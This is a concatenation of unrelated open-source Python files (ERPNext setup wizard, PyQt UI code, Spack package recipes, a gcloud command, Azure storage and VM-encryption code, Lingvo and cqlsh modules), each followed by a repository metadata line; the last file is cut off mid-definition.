    if not hasattr(frappe.local, "login_manager"):
        return
    frappe.local.login_manager.login_as(email)
def create_users(args):
    """Create an Employee for the wizard user, then create up to four
    additional Users (user_email_1..4) with role assignments taken from
    the wizard checkboxes, each with a matching Employee record."""
    # create employee for self
    emp = frappe.get_doc({
        "doctype": "Employee",
        "full_name": " ".join(filter(None, [args.get("first_name"), args.get("last_name")])),
        "user_id": frappe.session.user,
        "status": "Active",
        "company": args.get("company_name")
    })
    emp.flags.ignore_mandatory = True
    emp.insert(ignore_permissions = True)

    for i in xrange(1,5):
        email = args.get("user_email_" + str(i))
        fullname = args.get("user_fullname_" + str(i))
        if email:
            if not fullname:
                # Fall back to the mailbox part of the address.
                fullname = email.split("@")[0]

            # Split once: first token is first name, remainder is last name.
            parts = fullname.split(" ", 1)
            user = frappe.get_doc({
                "doctype": "User",
                "email": email,
                "first_name": parts[0],
                "last_name": parts[1] if len(parts) > 1 else "",
                "enabled": 1,
                "user_type": "System User"
            })

            # default roles
            user.append_roles("Projects User", "Stock User", "Support Team")

            if args.get("user_sales_" + str(i)):
                user.append_roles("Sales User", "Sales Manager", "Accounts User")
            if args.get("user_purchaser_" + str(i)):
                user.append_roles("Purchase User", "Purchase Manager", "Accounts User")
            if args.get("user_accountant_" + str(i)):
                user.append_roles("Accounts Manager", "Accounts User")

            user.flags.delay_emails = True

            # Only insert when no User with this email exists yet.
            if not frappe.db.get_value("User", email):
                user.insert(ignore_permissions=True)

                # create employee
                emp = frappe.get_doc({
                    "doctype": "Employee",
                    "full_name": fullname,
                    "user_id": email,
                    "status": "Active",
                    "company": args.get("company_name")
                })
                emp.flags.ignore_mandatory = True
                emp.insert(ignore_permissions = True)
@frappe.whitelist()
def load_messages(language):
    """Switch the session to *language* and push the setup-wizard and
    boot translation dictionaries to the client.

    :returns: the active language code (``frappe.local.lang``).
    """
    frappe.clear_cache()
    set_default_language(language)
    m = get_dict("page", "setup-wizard")
    m.update(get_dict("boot"))
    send_translations(m)
    return frappe.local.lang
@frappe.whitelist()
def load_languages():
    """Return the current default language name and the sorted list of
    all known language names, for the wizard's language selector."""
    language_names = sorted(get_lang_dict().keys())
    return {
        "default_language": get_language_from_code(frappe.local.lang),
        "languages": language_names,
    }
| indictranstech/reciphergroup-erpnext | erpnext/setup/page/setup_wizard/setup_wizard.py | Python | agpl-3.0 | 17,443 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/ckla/Documents/workspace/opus_trunk/opus_gui/main/views/list_editor.ui'
#
# Created: Sun May 10 00:57:43 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_ListEditor(object):
    """pyuic4-generated layout for the list-editor form.

    Do not edit by hand — regenerate from ``list_editor.ui`` instead
    (the file header warns that manual changes will be lost).
    """

    def setupUi(self, ListEditor):
        """Build the widget tree and layouts on the given ListEditor widget."""
        ListEditor.setObjectName("ListEditor")
        ListEditor.resize(310, 280)
        self.horizontalLayout_2 = QtGui.QHBoxLayout(ListEditor)
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        # Left column: move-up / move-down buttons with a stretch below them.
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        self.tb_up = QtGui.QToolButton(ListEditor)
        self.tb_up.setObjectName("tb_up")
        self.verticalLayout.addWidget(self.tb_up)
        self.tb_down = QtGui.QToolButton(ListEditor)
        self.tb_down.setObjectName("tb_down")
        self.verticalLayout.addWidget(self.tb_down)
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        self.horizontalLayout_2.addLayout(self.verticalLayout)
        # Right column: the list widget plus selection/edit controls below it.
        self.verticalLayout_2 = QtGui.QVBoxLayout()
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.listWidget = QtGui.QListWidget(ListEditor)
        self.listWidget.setObjectName("listWidget")
        self.verticalLayout_2.addWidget(self.listWidget)
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName("horizontalLayout_3")
        self.label = QtGui.QLabel(ListEditor)
        self.label.setObjectName("label")
        self.horizontalLayout_3.addWidget(self.label)
        self.toolButton = QtGui.QToolButton(ListEditor)
        self.toolButton.setObjectName("toolButton")
        self.horizontalLayout_3.addWidget(self.toolButton)
        self.verticalLayout_2.addLayout(self.horizontalLayout_3)
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.le_value = QtGui.QLineEdit(ListEditor)
        self.le_value.setObjectName("le_value")
        self.horizontalLayout.addWidget(self.le_value)
        self.tb_change = QtGui.QToolButton(ListEditor)
        self.tb_change.setObjectName("tb_change")
        self.horizontalLayout.addWidget(self.tb_change)
        self.tb_add = QtGui.QToolButton(ListEditor)
        self.tb_add.setObjectName("tb_add")
        self.horizontalLayout.addWidget(self.tb_add)
        self.verticalLayout_2.addLayout(self.horizontalLayout)
        self.horizontalLayout_2.addLayout(self.verticalLayout_2)

        self.retranslateUi(ListEditor)
        QtCore.QMetaObject.connectSlotsByName(ListEditor)

    def retranslateUi(self, ListEditor):
        """Apply all user-visible strings (run through Qt's translate)."""
        ListEditor.setWindowTitle(QtGui.QApplication.translate("ListEditor", "Form", None, QtGui.QApplication.UnicodeUTF8))
        self.tb_up.setText(QtGui.QApplication.translate("ListEditor", "^", None, QtGui.QApplication.UnicodeUTF8))
        self.tb_down.setText(QtGui.QApplication.translate("ListEditor", "v", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("ListEditor", "Selected:", None, QtGui.QApplication.UnicodeUTF8))
        self.toolButton.setText(QtGui.QApplication.translate("ListEditor", "-", None, QtGui.QApplication.UnicodeUTF8))
        self.tb_change.setText(QtGui.QApplication.translate("ListEditor", "=", None, QtGui.QApplication.UnicodeUTF8))
        self.tb_add.setText(QtGui.QApplication.translate("ListEditor", "+", None, QtGui.QApplication.UnicodeUTF8))
| apdjustino/DRCOG_Urbansim | src/opus_gui/main/views/ui_list_editor.py | Python | agpl-3.0 | 3,680 |
# strftime/strptime pattern: ISO-8601 timestamp with a literal "+00:00"
# UTC offset appended (the offset is fixed text, not computed).
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S+00:00'
| liveblog/liveblog | server/liveblog/tests/test_settings.py | Python | agpl-3.0 | 40 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RPhilentropy(RPackage):
    """Computes 46 optimized distance and similarity measures for comparing
    probability functions (Drost (2018) <doi:10.21105/joss.00765>). These
    comparisons between probability functions have their foundations in a broad
    range of scientific disciplines from mathematics to ecology. The aim of
    this package is to provide a core framework for clustering, classification,
    statistical inference, goodness-of-fit, non-parametric statistics,
    information theory, and machine learning tasks that are based on comparing
    univariate or multivariate probability functions."""

    homepage = "https://github.com/HajkD/philentropy"
    url = "https://cloud.r-project.org/src/contrib/philentropy_0.4.0.tar.gz"
    # CRAN archive location, used by Spack to fetch non-current versions.
    list_url = "https://cloud.r-project.org/src/contrib/Archive/philentropy"

    version('0.4.0', sha256='bfd30bf5635aab6a82716299a87d44cf96c7ab7f4ee069843869bcc85c357127')

    # R and R-package dependencies (build and run time).
    depends_on('r@3.1.2:', type=('build', 'run'))
    depends_on('r-rcpp', type=('build', 'run'))
    depends_on('r-dplyr', type=('build', 'run'))
    depends_on('r-kernsmooth', type=('build', 'run'))
| iulian787/spack | var/spack/repos/builtin/packages/r-philentropy/package.py | Python | lgpl-2.1 | 1,356 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Wgsim(Package):
    """Wgsim is a small tool for simulating sequence reads from a reference
    genome.

    It is able to simulate diploid genomes with SNPs and insertion/deletion
    (INDEL) polymorphisms, and simulate reads with uniform substitution
    sequencing errors. It does not generate INDEL sequencing errors, but this
    can be partly compensated by simulating INDEL polymorphisms."""

    homepage = "https://github.com/lh3/wgsim"
    git = "https://github.com/lh3/wgsim.git"

    # Upstream has no tagged releases; pin a known commit.
    version('2011.10.17', commit='a12da3375ff3b51a5594d4b6fa35591173ecc229')

    depends_on('zlib')

    def install(self, spec, prefix):
        """Compile the single C source directly (no build system upstream)
        and install the whole source tree into the prefix."""
        cc = Executable(spack_cc)

        # Link zlib (-lz) and libm (-lm), which wgsim.c requires.
        cc('-g', '-O2', '-Wall', '-o', 'wgsim', 'wgsim.c', '-lz', '-lm')
        install_tree(self.stage.source_path, prefix.bin)
| iulian787/spack | var/spack/repos/builtin/packages/wgsim/package.py | Python | lgpl-2.1 | 1,027 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyUnicycler(PythonPackage):
    """Unicycler is an assembly pipeline for bacterial genomes. It can
    assemble Illumina-only read sets where it functions as a SPAdes-optimiser.
    It can also assembly long-read-only sets (PacBio or Nanopore) where it
    runs a miniasm+Racon pipeline. For the best possible assemblies, give it
    both Illumina reads and long reads, and it will conduct a hybrid assembly.
    """

    homepage = "https://github.com/rrwick/Unicycler"
    url = "https://github.com/rrwick/Unicycler/archive/v0.4.5.tar.gz"

    version('0.4.7', sha256='a8cf65e46dc2694b0fbd4e9190c73a1f300921457aadfab27a1792b785620d63')
    version('0.4.6', sha256='56f6f358a5d1f8dd0fcd1df04504079fc42cec8453a36ee59ff89295535d03f5')
    version('0.4.5', sha256='67043656b31a4809f8fa8f73368580ba7658c8440b9f6d042c7f70b5eb6b19ae')

    depends_on('python@3.4:', type=('build', 'link', 'run'))
    depends_on('py-setuptools', type=('build', 'run'))
    # External assembler/polisher/aligner tools invoked by the pipeline.
    depends_on('spades', type='run')
    depends_on('pilon', type='run')
    depends_on('jdk', type=('build', 'run'))
    depends_on('bowtie2', type='run')
    depends_on('samtools@1.0:', type=('build', 'link', 'run'))
    depends_on('racon', type=('build', 'link', 'run'))
    depends_on('blast-plus', type='run')

    # Minimum compiler versions — presumably needed to build the C++
    # components; verify against upstream build requirements.
    conflicts('%gcc@:4.9.0')
    conflicts('%clang@:3.4.2')
| iulian787/spack | var/spack/repos/builtin/packages/py-unicycler/package.py | Python | lgpl-2.1 | 1,554 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""Schema for mirrors.yaml configuration file.
.. literalinclude:: ../spack/schema/mirrors.py
:lines: 32-
"""
schema = {
'$schema': 'http://json-schema.org/schema#',
'title': 'Spack mirror configuration file schema',
'type': 'object',
'additionalProperties': False,
'patternProperties': {
r'mirrors': {
'type': 'object',
'default': {},
'additionalProperties': False,
'patternProperties': {
r'\w[\w-]*': {
'type': 'string'},
},
},
},
}
| TheTimmy/spack | lib/spack/spack/schema/mirrors.py | Python | lgpl-2.1 | 1,811 |
# Odoo/OpenERP addon manifest for pos_multi_session.
{
    'name': "Sync POS orders across multiple sessions",
    'version': '1.0.0',
    'author': 'Ivan Yelizariev',
    'category': 'Point Of Sale',
    'website': 'https://yelizariev.github.io',
    # 'bus' is presumably used as the transport for cross-session sync;
    # verify against the module's JS/controllers.
    'depends': ['pos_disable_payment', 'bus'],
    'data': [
        'security/ir.model.access.csv',
        'views.xml',
    ],
    'qweb': [
        'static/src/xml/pos_multi_session.xml',
    ],
    'installable': True,
}
| odoocn/pos-addons | pos_multi_session/__openerp__.py | Python | lgpl-3.0 | 424 |
#!/usr/bin/env python
import os, sys
import unittest
from gppylib import gplog
from gpsegstart import GpSegStart
from mock import patch
logger = gplog.get_unittest_logger()
class GpSegStartTestCase(unittest.TestCase):
    """Unit tests for GpSegStart.checkPostmasters, with the worker pool,
    version lookup and pid checks mocked out."""

    @patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=[])
    @patch('gpsegstart.gp.GpVersion.local', return_value=None)
    @patch('gpsegstart.base.WorkerPool')
    def test_check_postmasters_01(self, mk1, mk2, mk3):
        """No status keys to check -> checkPostmasters reports success."""
        # Pipe-delimited segment descriptor, as passed on the command line.
        db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
        gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
        result = gpseg.checkPostmasters(False)
        self.assertTrue(result)

    @patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=['foo1', 'foo2'])
    @patch('gpsegstart.gp.check_pid', return_value=False)
    @patch('gpsegstart.gp.GpVersion.local', return_value=None)
    @patch('gpsegstart.base.WorkerPool')
    def test_check_postmasters_02(self, mk1, mk2, mk3, mk4):
        """All postmaster pids dead -> checkPostmasters reports failure."""
        db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
        gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
        result = gpseg.checkPostmasters(False)
        self.assertFalse(result)

    @patch('gpsegstart.GpSegStart.getOverallStatusKeys', return_value=['foo1', 'foo2'])
    @patch('gpsegstart.gp.check_pid', side_effect=[False, True])
    @patch('gpsegstart.gp.GpVersion.local', return_value=None)
    @patch('gpsegstart.base.WorkerPool')
    def test_check_postmasters_03(self, mk1, mk2, mk3, mk4):
        """One dead pid out of two -> checkPostmasters still reports failure."""
        db = '1|1|p|p|s|u|mdw|mdw-1|2000|/data/gpseg-1s'
        gpseg = GpSegStart([db], None, 'col1:col2:col3', 'quiescent', None, None, None, None, None, None, None)
        result = gpseg.checkPostmasters(False)
        self.assertFalse(result)
#------------------------------- Mainline --------------------------------
if __name__ == '__main__':
    # Run this module's unit tests when executed as a script.
    unittest.main()
| Chibin/gpdb | gpMgmt/bin/gppylib/test/unit/test_cluster_gpsegstart.py | Python | apache-2.0 | 1,956 |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for setting scheduling for virtual machine instances."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instance_flags
class SetSchedulingInstances(base_classes.NoOutputAsyncMutator):
  """Set scheduling options for Google Compute Engine virtual machine instances.
  """

  @staticmethod
  def Args(parser):
    """Register the command's flags: --restart-on-failure, the
    maintenance-policy flags and the instance name argument."""
    restart_on_failure = parser.add_argument(
        '--restart-on-failure',
        action='store_true',
        default=None,  # Tri-valued: None => don't change the setting.
        help='Restart instances if they are terminated by Compute Engine.')
    restart_on_failure.detailed_help = """\
        The instances will be restarted if they are terminated by Compute '
        Engine. This does not affect terminations performed by the user.'
        """

    instance_flags.AddMaintenancePolicyArgs(parser)
    instance_flags.INSTANCE_ARG.AddArgument(parser)

  @property
  def service(self):
    # API service that handles the request.
    return self.compute.instances

  @property
  def method(self):
    # API method name invoked on the service.
    return 'SetScheduling'

  @property
  def resource_type(self):
    return 'instances'

  def CreateRequests(self, args):
    """Returns a list of request necessary for setting scheduling options."""
    instance_ref = instance_flags.INSTANCE_ARG.ResolveAsResource(
        args, self.resources, scope_lister=flags.GetDefaultScopeLister(
            self.compute_client, self.project))

    scheduling_options = self.messages.Scheduling()

    # None leaves automaticRestart unchanged (tri-valued flag, see Args).
    scheduling_options.automaticRestart = args.restart_on_failure

    if args.maintenance_policy:
      scheduling_options.onHostMaintenance = (
          self.messages.Scheduling.OnHostMaintenanceValueValuesEnum(
              args.maintenance_policy))

    request = self.messages.ComputeInstancesSetSchedulingRequest(
        instance=instance_ref.Name(),
        project=self.project,
        scheduling=scheduling_options,
        zone=instance_ref.zone)

    return [request]
SetSchedulingInstances.detailed_help = {
'brief': ('Set scheduling options for Google Compute Engine virtual '
'machines'),
'DESCRIPTION': """\
*${command}* is used to configure scheduling options for Google Compute
Engine virtual machines.
""",
}
| KaranToor/MA450 | google-cloud-sdk/lib/surface/compute/instances/set_scheduling.py | Python | apache-2.0 | 2,935 |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
class HTTPError(Exception):
    '''
    Represents an HTTP Exception when response status code >= 300.

    The human-readable message is passed to ``Exception.__init__`` and is
    therefore available via ``str(error)``.

    :ivar int status:
        the status code of the response
    :ivar respheader:
        the returned headers
    :ivar bytes respbody:
        the body of the response
    '''

    def __init__(self, status, message, respheader, respbody):
        self.status = status
        self.respheader = respheader
        self.respbody = respbody
        Exception.__init__(self, message)
class HTTPResponse(object):
    '''
    Value object describing a completed HTTP exchange.

    :ivar int status:
        the status code of the response
    :ivar str message:
        the status message accompanying the code
    :ivar dict headers:
        the returned headers
    :ivar bytes body:
        the raw response body
    '''

    def __init__(self, status, message, headers, body):
        # Pure data holder: store everything verbatim, no parsing.
        self.status, self.message = status, message
        self.headers, self.body = headers, body
class HTTPRequest(object):
    '''
    Value object describing an HTTP request to be issued.

    :ivar str host:
        the host name to connect to
    :ivar str method:
        the HTTP verb (GET, POST, PUT, etc.)
    :ivar str path:
        the uri fragment
    :ivar dict query:
        query parameters
    :ivar dict headers:
        header values
    :ivar bytes body:
        the body of the request.
    '''

    def __init__(self):
        # Every request starts out empty; callers populate the fields
        # before handing the request to an HTTP client.
        for text_attr in ('host', 'method', 'path', 'body'):
            setattr(self, text_attr, '')
        self.query = {}    # query parameter name -> value
        self.headers = {}  # header name -> header value
| rajrohith/blobstore | azure/storage/_http/__init__.py | Python | apache-2.0 | 2,461 |
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import os
import re
import sys
from time import sleep
from OSEncryptionState import *
class UnmountOldrootState(OSEncryptionState):
    def __init__(self, context):
        # Register this state under its canonical name with the shared
        # encryption context.
        super(UnmountOldrootState, self).__init__('UnmountOldrootState', context)
    def should_enter(self):
        """Return True when this state may be entered: the base-class
        preconditions hold, /oldroot exists, and /oldroot is currently
        a mountpoint."""
        self.context.logger.log("Verifying if machine should enter unmount_oldroot state")

        if not super(UnmountOldrootState, self).should_enter():
            return False

        self.context.logger.log("Performing enter checks for unmount_oldroot state")

        # Second positional arg presumably means raise-on-failure (as in the
        # other Execute calls in this file) — so a missing /oldroot aborts here.
        self.command_executor.ExecuteInBash('[ -e "/oldroot" ]', True)

        # mountpoint(1) returns non-zero when /oldroot is not mounted.
        if self.command_executor.Execute('mountpoint /oldroot') != 0:
            return False

        return True
def enter(self):
if not self.should_enter():
return
self.context.logger.log("Entering unmount_oldroot state")
self.command_executor.Execute('systemctl rescue', True)
self.command_executor.Execute('systemctl start sshd.service', True)
self.command_executor.Execute('systemctl start walinuxagent.service', True)
proc_comm = ProcessCommunicator()
self.command_executor.Execute(command_to_execute="systemctl list-units",
raise_exception_on_failure=True,
communicator=proc_comm)
for line in proc_comm.stdout.split('\n'):
if not "running" in line:
continue
if "walinuxagent.service" in line or "sshd.service" in line:
continue
match = re.search(r'\s(\S*?\.service)', line)
if match:
service = match.groups()[0]
self.command_executor.Execute('systemctl restart {0}'.format(service))
self.command_executor.Execute('swapoff -a', True)
self.bek_util.umount_azure_passhprase(self.encryption_config, force=True)
if os.path.exists("/oldroot/mnt"):
self.command_executor.Execute('umount /oldroot/mnt')
if os.path.exists("/oldroot/mnt/azure_bek_disk"):
self.command_executor.Execute('umount /oldroot/mnt/azure_bek_disk')
if os.path.exists("/mnt"):
self.command_executor.Execute('umount /mnt')
if os.path.exists("/mnt/azure_bek_disk"):
self.command_executor.Execute('umount /mnt/azure_bek_disk')
proc_comm = ProcessCommunicator()
self.command_executor.Execute(command_to_execute="fuser -vm /oldroot",
raise_exception_on_failure=True,
communicator=proc_comm)
self.context.logger.log("Processes using oldroot:\n{0}".format(proc_comm.stdout))
procs_to_kill = filter(lambda p: p.isdigit(), proc_comm.stdout.split())
procs_to_kill = reversed(sorted(procs_to_kill))
for victim in procs_to_kill:
proc_name = ""
try:
with open("/proc/{0}/cmdline".format(victim)) as f:
proc_name = f.read()
except IOError as e:
self.context.logger.log("Proc {0} is already dead".format(victim))
self.context.logger.log("Killing process: {0} ({1})".format(proc_name, victim))
if int(victim) == os.getpid():
self.context.logger.log("Restarting WALA in 30 seconds before committing suicide")
# Kill any other daemons that are blocked and would be executed after this process commits
# suicide
self.command_executor.ExecuteInBash('sleep 30 && pkill -f .*ForLinux.*handle.py.*daemon.* && systemctl start walinuxagent &', True)
if int(victim) == 1:
self.context.logger.log("Skipping init")
continue
if "mount.ntfs" in proc_name:
self.context.logger.log("Skipping mount.ntfs")
continue
self.command_executor.Execute('kill -9 {0}'.format(victim))
self.command_executor.Execute('telinit u', True)
sleep(3)
self.command_executor.Execute('umount /oldroot', True)
sleep(3)
attempt = 1
while True:
if attempt > 10:
raise Exception("Block device {0} did not appear in 10 restart attempts".format(self.rootfs_block_device))
self.context.logger.log("Restarting systemd-udevd")
self.command_executor.Execute('systemctl restart systemd-udevd')
self.context.logger.log("Restarting systemd-timesyncd")
self.command_executor.Execute('systemctl restart systemd-timesyncd')
sleep(10)
if self.command_executor.ExecuteInBash('[ -b {0} ]'.format(self.rootfs_block_device), False) == 0:
break
attempt += 1
self.command_executor.Execute('e2fsck -yf {0}'.format(self.rootfs_block_device), True)
def should_exit(self):
self.context.logger.log("Verifying if machine should exit unmount_oldroot state")
if os.path.exists('/oldroot/bin'):
self.context.logger.log("/oldroot was not unmounted")
return False
return super(UnmountOldrootState, self).should_exit()
| varunkumta/azure-linux-extensions | VMEncryption/main/oscrypto/ubuntu_1604/encryptstates/UnmountOldrootState.py | Python | apache-2.0 | 5,976 |
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from common import runtests
from .shared import try_except_maker3
from .shared import setGenerator, test_exceptions
# Configure the shared exception-test harness to use the try_except_maker3
# generator variant, then run the whole test suite against it.
setGenerator(try_except_maker3)
runtests(test_exceptions)
| tempbottle/ironpython3 | Tests/compat/sbs_exceptions/try_except3.py | Python | apache-2.0 | 904 |
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global import for model hyper-parameters.
Using this module any ModelParams can be accessed via GetParams.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import REDACTED.tensorflow_models.mlperf.models.rough.transformer_lingvo.lingvo.compat as tf
def _Import(name):
  """Imports the python module of the given name, tolerating absence."""
  tf.logging.info('Importing %s', name)
  try:
    importlib.import_module(name)
  except ImportError as e:
    # Missing modules are expected; not every build ships every task.
    tf.logging.info('Could not import %s: %s', name, e)
  else:
    tf.logging.info('Imported %s', name)
# Root package under which every task's params modules live.
_TASK_ROOT = 'REDACTED.tensorflow_models.mlperf.models.rough.transformer_lingvo.lingvo.tasks'
# Task subdirectories that may contain registered model params.
# LINT.IfChange(task_dirs)
_TASK_DIRS = (
    'asr',
    'car',
    'image',
    'lm',
    'mt',
    'punctuator',
)
# LINT.ThenChange(tasks/BUILD:task_dirs)
def ImportAllParams(task_root=_TASK_ROOT, task_dirs=_TASK_DIRS):
  """Imports every task's params package so all ModelParams self-register."""
  # By repository convention each task ships params/params.py, which in turn
  # imports every module that may register a model param.
  for task_name in task_dirs:
    _Import('{}.{}.params.params'.format(task_root, task_name))
def ImportParams(model_name, task_root=_TASK_ROOT, task_dirs=_TASK_DIRS):
  """Attempts to only import the files that may contain the model."""
  # 'model_name' is expected to look like <task>.<path>.<class name>.
  if '.' not in model_name:
    raise ValueError('Invalid model name %s' % model_name)
  model_module, _, _ = model_name.rpartition('.')
  # First try the module as-is, in case it is locally importable.
  _Import(model_module)
  # Then look for a matching built-in task params module.
  for task_dir in sorted(task_dirs):
    prefix = task_dir + '.'
    if model_module.startswith(prefix):
      relative_path = model_module[len(prefix):]
      _Import('{}.{}.params.{}'.format(task_root, task_dir, relative_path))
| mlperf/training_results_v0.7 | Google/benchmarks/transformer/implementations/transformer-research-TF-tpu-v4-16/lingvo/model_imports.py | Python | apache-2.0 | 2,689 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .cqlhandling import CqlParsingRuleSet, Hint
from cassandra.metadata import maybe_escape_name
# CQL native scalar type names offered by the type-name completer.
simple_cql_types = set(('ascii', 'bigint', 'blob', 'boolean', 'counter', 'date', 'decimal', 'double', 'duration', 'float',
                        'inet', 'int', 'smallint', 'text', 'time', 'timestamp', 'timeuuid', 'tinyint', 'uuid', 'varchar', 'varint'))
# Collection type names must never appear in the scalar set.
simple_cql_types.difference_update(('set', 'map', 'list'))
from . import helptopics
# Module-level help topics instance for CQL 3.
cqldocs = helptopics.CQL3HelpTopics()
class UnexpectedTableStructure(UserWarning):
    """Warning for table layouts that may not translate cleanly to CQL."""

    def __init__(self, msg):
        # Keep the detail message for __str__ and for programmatic access.
        self.msg = msg

    def __str__(self):
        prefix = 'Unexpected table structure; may not translate correctly to CQL. '
        return prefix + self.msg
# Keyspaces shipped by Cassandra itself; excluded by the non-system completer.
SYSTEM_KEYSPACES = ('system', 'system_schema', 'system_traces', 'system_auth', 'system_distributed')
# Keyspaces that may not be ALTERed (misspelled name kept for compatibility).
NONALTERBALE_KEYSPACES = ('system', 'system_schema')
class Cql3ParsingRuleSet(CqlParsingRuleSet):
    """CQL3-specific option tables and quoting helpers for the completer."""
    # Scalar table options: (CQL option name, legacy schema column or None).
    columnfamily_layout_options = (
        ('bloom_filter_fp_chance', None),
        ('comment', None),
        ('dclocal_read_repair_chance', 'local_read_repair_chance'),
        ('gc_grace_seconds', None),
        ('min_index_interval', None),
        ('max_index_interval', None),
        ('read_repair_chance', None),
        ('default_time_to_live', None),
        ('speculative_retry', None),
        ('memtable_flush_period_in_ms', None),
        ('cdc', None)
    )
    columnfamily_layout_map_options = (
        # (CQL3 option name, schema_columnfamilies column name (or None if same),
        # list of known map keys)
        ('compaction', 'compaction_strategy_options',
            ('class', 'max_threshold', 'tombstone_compaction_interval', 'tombstone_threshold', 'enabled', 'unchecked_tombstone_compaction', 'only_purge_repaired_tombstones')),
        ('compression', 'compression_parameters',
            ('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
        ('caching', None,
            ('rows_per_partition', 'keys')),
    )
    # No options are currently flagged as obsolete.
    obsolete_cf_options = ()
    # Consistency levels offered by CONSISTENCY completion.
    consistency_levels = (
        'ANY',
        'ONE',
        'TWO',
        'THREE',
        'QUORUM',
        'ALL',
        'LOCAL_QUORUM',
